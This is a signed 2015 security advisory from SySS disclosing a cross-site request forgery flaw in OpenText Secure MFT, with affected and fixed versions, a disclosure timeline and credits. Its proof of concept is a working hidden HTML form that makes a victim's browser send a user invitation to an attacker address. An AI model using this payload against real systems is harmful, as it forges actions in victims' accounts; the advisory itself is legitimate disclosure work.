Secure MFT Cross Site Request Forgery
Posted on 06 October 2015
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-039 Product: Secure MFT Vendor: http://www.opentext.com Affected Version(s): 2013 R3, 2014 R1/R2, 2015 R1 Tested Version(s): 2014 R2 SP4 Vulnerability Type: Cross-Site Request Forgery (CWE-352) Risk Level: Medium Solution Status: Fixed Vendor Notification: 2015-08-05 Solution Date: 2015-09-23 Public Disclosure: 2015-10-02 CVE Reference: Not yet assigned Author of Advisory: Dr. Adrian Vollmer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Secure MFT aims to replace FTP or file transfer via e-mail by providing a secure and easy-to-use alternative. Users can send each other files of practically any size either by using a Microsoft Windows client, a Microsoft Outlook plugin or a web application. The software manufacturer describes the application as follows (see [1]): "OpenText Secure MFT is an enterprise-grade managed file transfer solution that delivers uncompromising security to safely exchange large files." ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The web application is vulnerable to Cross-Site Request Forgery since no tokens are used to prevent this kind of attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): As a proof of concept, the following HTML document could be used by an attacker to perform actions in the context of the victim if the attacker manages to trick the victim into opening the document in their browser. <html> <body> <form action="https://[Secure MFT host]/userinvitation" method="POST"> <input type="hidden" name="email" value="attacker@example.org" /> <input type="hidden" name="subject" value="CSRF Invite" /> <input type="hidden" name="message" value="CSRF Message" /> <input type="submit" value="Submit request" /> </form> </body> </html> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update Secure MFT to one of the following versions or newer: * Secure MFT 2013 R3 SP7 * Secure MFT 2014 R1 SP11 * Secure MFT 2014 R2 SP5 * Secure MFT 2015 R1 SP1 * Secure MFT 2015 R1 FP1 SP1 Software updates are available at [5]. For further information, see [4]. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2015-07-01: Vulnerability discovered 2015-08-05: Vulnerability reported to vendor 2015-09-23: Vendor publishes security alert 2015-10-02: Public release of security advisory according to the SySS Responsible Disclosure Policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Web site of Secure MFT https://www.opentext.com/what-we-do/products/information-exchange/secure-messaging/opentext-secure-mft [2] SySS Security Advisory SYSS-2015-039 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2015-039.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ [4] https://knowledge.opentext.com/knowledge/cs.dll/Open/61171764 (Knowledge Center log on required) [5] https://knowledge.opentext.com/knowledge/llisapi.dll?func=ll&objId=61042901&objAction=browse&viewType=1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Dr. Adrian Vollmer of the SySS GmbH. E-Mail: adrian.vollmer (at) syss.de Key fingerprint = 70CF E88C AEE7 DB0F 5DC8 3403 0E02 7C7E 037C 9FE7 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBCgAGBQJWDi/6AAoJEA4CfH4DfJ/n5WkP/0aveg0S+J2aKuwVv88wNwTr 0lMQFAM83UWmpgP6Mj/PrmMOQBK+Qc41sHsJ737ibEIxcnPhNXlpbN8d+TMl9uJ5 dqQAcLecTC3gzfuNvu89qhoG1XOP34lKCgVHMP1NTsyzvqORR7TZYYMSxHicA4+y qSvWcjiIiyfSHTvcHj4/TU7UjqE4CBQehqw184Jor7vg5hm5OH2eJl0M4ptpMLek QoQkf6IpVZrdXzPwknUMra/LKxIDmGouPwhEKXNmkJV1Ti6FbgN/td+6gbpnqPbi pUHn5VQsxlBXlf9KuJX9lZKshrtxXZ0hLbK32qVEAO9rDwgUeDN4YQFK0CHAlFNi 0p7WdQbR8o47l8e77IrwsKWmmo6z5SkaeOZYMgvCrzH/9mGfbVk43HQ/iMA8jN3J ggEaK+9l+7r/VWGNt7QLkf/h0sBlfqaj626gw5ncFF9/9Hc61ouC0UQEzLrAYYz6 FvHvEKzISUPkSzVcKH6K4cfjIvsj57Hs1jghVMBibTeVQf7hTVn2KMUHzno/ZI4y fAU6slyu4aG8Y/SrHqGUqEKVGtLXaSGo8TsDjThU7pxeFvbIfCM1z7J0I6QuztLl hN2PLWI48M72xgv/hm2wBaCTLG41BGFHbY7MzWacCuq568aCm+tFOWqGVhsTOPXm Tu89cKLfbXW4oarRud5W =aroc -----END PGP SIGNATURE-----